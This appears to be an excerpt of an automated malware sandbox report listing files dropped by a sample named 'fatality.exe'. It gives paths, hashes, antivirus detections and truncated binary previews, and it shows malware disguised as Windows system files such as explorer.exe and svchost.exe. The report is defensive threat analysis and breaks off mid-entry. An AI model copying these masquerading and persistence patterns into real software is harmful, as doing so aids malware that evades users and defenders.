                                                                                                                                                          SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF7CFA9E15FE517528.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0149379474325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXvit9Xblt59Xh9XR5+1lf35X:rl3b/VFQSbltD7Ovf5
                                                                                                                                                          MD5:48B2AE498263AE8D95A5B45F66D47B89
                                                                                                                                                          SHA1:A0D07C2802630C81FD804DDF501F6F6605A30B2D
                                                                                                                                                          SHA-256:724F6AD6BD4E72EAB6461CAC513C5F76AA96D85753219B644F40D5A02C396F98
                                                                                                                                                          SHA-512:9AF623E3F1407BC4E4896B6B4343789F0BE7D4113FDBFCAE7FE7C3005BE16A0537772F36569AAACC0959343DA6AD8DD0D121714DB84717419C3005C9FB41F26B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF88D7B5258793E5B4.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0150719828554693
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXJkmltt9Xblt59Xh9XR5+1lf35X:rl3b/VFQJkWbltD7Ovf5
                                                                                                                                                          MD5:989CD58B0A45643D3D2766B2FBD8AA82
                                                                                                                                                          SHA1:364C3A83FDEB9CF96E5B1C68B195EA3B4A0A1951
                                                                                                                                                          SHA-256:79AC80B312DDE02284296E160790D58287EF2833E5CA7B3A9793EF3BECBD5D60
                                                                                                                                                          SHA-512:9E4C4110CE06FA2F6B418B22C2DB17C15EE620CAF64BB91FBED36A8D9C3F0CF639A6413612D240AB409FACD02CCFBDF440DB72C961A3BF3B8C6F4AD8F99C1FF9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFC4367F44B197E5DE.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0149379474325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXyt9Xblt59Xh9XR5+1lf35X:rl3b/VFQqbltD7Ovf5
                                                                                                                                                          MD5:981D466F9DD335B309B132B77E7380F5
                                                                                                                                                          SHA1:5D4828023D35BB2FE20520C8EE7A379CD052CB4B
                                                                                                                                                          SHA-256:C7E612EDC352A0614B3CE7C04CF2E572D3B79DCC569DDAAFC2A2CBD673D120C2
                                                                                                                                                          SHA-512:3310377531D3B7808BD69E594FD9B3B8FA7187996A8A02F4BF5C14D9CBBDCCEFF6C6CC10849FD3780D098CEEE0EC2BD08684F01C27D1027147640EC47A1BCD98
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFF96BEF9668911AC6.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16384
                                                                                                                                                          Entropy (8bit):0.4022769148265937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                          MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                          SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                          SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                                                                          SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\AddIns\c0a39dc94da3cf

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (391), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):391
                                                                                                                                                          Entropy (8bit):5.862603068110846
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:ZwGSAtgvT3df+I69R/IpPRin9XnwPsL13nTTuPYUfDPsVQbhXVU63zpBwbxEQ:iGXtUf+I6UpinFwkLQPPL0uZDweQ
                                                                                                                                                          MD5:6C771D221991C6283054FE2D277778D1
                                                                                                                                                          SHA1:FB4A74464D44805B3DF2BE88C1AF4ADEB5003167
                                                                                                                                                          SHA-256:51932F49A1C96C94FB623FB1866687C247FF6C1FB5CC7613D59A214B53308171
                                                                                                                                                          SHA-512:B0543A58C33BCE0D614F0DAD2B8E861769D2EFAC6F0E50A6FF2E143EAD874AD48FC88E3FE9359273A0EA02CCB048A21EDC552BB76A2B10F001233FD6B04C658B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Ovaydc7Cl6MZC9AuQoIMgVou6jWO0enEwL9dkdl5yME7Dyiw2B0GTy13Gq13GtLGTHm1AgJwCNXTQrqIAjVzogv7UGX3lryFA7o6LrwV1DEGahmYAt3gXWcxWph3IQLUYSTTDt6Tx98lcogwd832ySroe1jgJ3Mk2tsIOTVQwjtXX1UrIuZKWSfGkoyMJaJ4wXss6YiKmnGPiUQng2XZdCOkNlhjfJGVZzk9ImuuMPhsLQhQXKpRDuauJIeU08pchvzstRe4HmMNffY7DRMUeyRpY00AHZ4NkELabzgGpvJahMPnuhQiwU8sdJT2aexss9naU8fOuFosp1HMlNQjIVbPFc6RfnqL8brijySwCCxqpQDlCHRNONjWhXU2BOsGZduOJjn

                                                                                                                                                          C:\Users\user\Desktop\FJTVnRjh.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23552
                                                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: SearchIndexer.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: VIyu4dC9CU.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: OisrvsB6Ea.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: ntoskrnl2.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: top.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: DC86.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                                                                                                          • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\Desktop\SdSCeHzI.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85504
                                                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                                          C:\Users\user\Desktop\XWvbHmEw.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33792
                                                                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\Desktop\ZKzjsAAu.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32256
                                                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\Desktop\fatality.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3319076
                                                                                                                                                          Entropy (8bit):7.783232715391711
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:hb5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8Nb:FMyqKM1TogtqT44NNb
                                                                                                                                                          MD5:A7040B85FC683F088F4C6E5B44052C43
                                                                                                                                                          SHA1:7E3D644D1A1FB7B9BCCCB6406D2E7FBD062EAE66
                                                                                                                                                          SHA-256:B786F31F1C89C71D0510BBD32510595D9891C67DB516F968261B02594A423A8D
                                                                                                                                                          SHA-512:E225F6F7E114690AAD25E9C67460E50F5B84CC8CA87A69BA94FF63AB42415DF176A3ED6C3456CDDB849927604A4888B17E5E781AC97D2BA0197F9687BBB2C301
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b.....................................0....@...........................>...........@......................... ./.4...T./...... ......................../.............................................................................................. ..........................@................0...H..................@............P..........................@................0......................@................@...&..................@............0....... ...:..............@....rsrc........ .......Z..............@.............'.........................@...cheat....p..../..p..................@...........................................................................................................................

                                                                                                                                                          C:\Users\user\Desktop\hEPrrPJe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):5.645950918301459
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\Desktop\zRrwKlet.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):69632
                                                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                          C:\Windows\Resources\Themes\explorer.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138366
                                                                                                                                                          Entropy (8bit):5.825787831277215
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZX:UVqoCl/YgjxEufVU0TbTyDDalXX
                                                                                                                                                          MD5:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          SHA1:175DC72F78382FBB68361DE083A9E1B327A5280D
                                                                                                                                                          SHA-256:F8F72A6C6BDEA3733CCB70283DB5B95FE161080F1ECA2364E3C576D8906EBA15
                                                                                                                                                          SHA-512:8906A4BF4F8DA2CF8211B38F699654AA3A73D866B9E5119A382B75A3E91E6E7ACEF5BD88A30499ADB8CE5DF192BAEFA007A38269916EF4C53D7B734C5BD3E234
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Resources\Themes\icsys.icn.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138518
                                                                                                                                                          Entropy (8bit):5.843329840311764
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZAlllllllllllle:UVqoCl/YgjxEufVU0TbTyDDalXv
                                                                                                                                                          MD5:D36CC2935AE0E7A5D2936DB589A9B8CC
                                                                                                                                                          SHA1:082BD58C0AD60FA4783B63A4F681A5C5FAD8E1A6
                                                                                                                                                          SHA-256:4C93ADB50768FEB3CDEA95F1FEDC5D6FDC262D59F12C4B66601D377E2709C2E3
                                                                                                                                                          SHA-512:547452BA0DE7C8EBEEC8E4BB2D916C7A881B6743E6D1FB6D2761A202B7CF5BB30C3F541957DE70C584B46B7171F3F20338B4985341829B408C366AEAECED9290
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Resources\spoolsv.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138480
                                                                                                                                                          Entropy (8bit):5.834248021973514
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVZJ:UVqoCl/YgjxEufVU0TbTyDDalXJ
                                                                                                                                                          MD5:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          SHA1:E6A3EEA3DFD640B299C3A1171BF1B40A6A6E137E
                                                                                                                                                          SHA-256:70C903741D63FE1D7323334677FA2A3229F674EB2BF5711ECCBF04D50844447F
                                                                                                                                                          SHA-512:B3F8AC8AA281F34431B77DCDA528D9E50E71956847348A37C3804A9CC849D5E7ADDC0480C4513D5300E37733766DA027B6B248882F337B8C4688C53C589F10BB
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Resources\svchost.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):138449
                                                                                                                                                          Entropy (8bit):5.854750064478844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:UVqoCl/YgjxEufVU0TbTyDDalXx++++++++++++++++++++++++++++++++++++f:UsLqdufVUNDab
                                                                                                                                                          MD5:5020DD008EA5092AFC4BBD7961322484
                                                                                                                                                          SHA1:50CCECF527CD22933722507FBC8F51963A6920F4
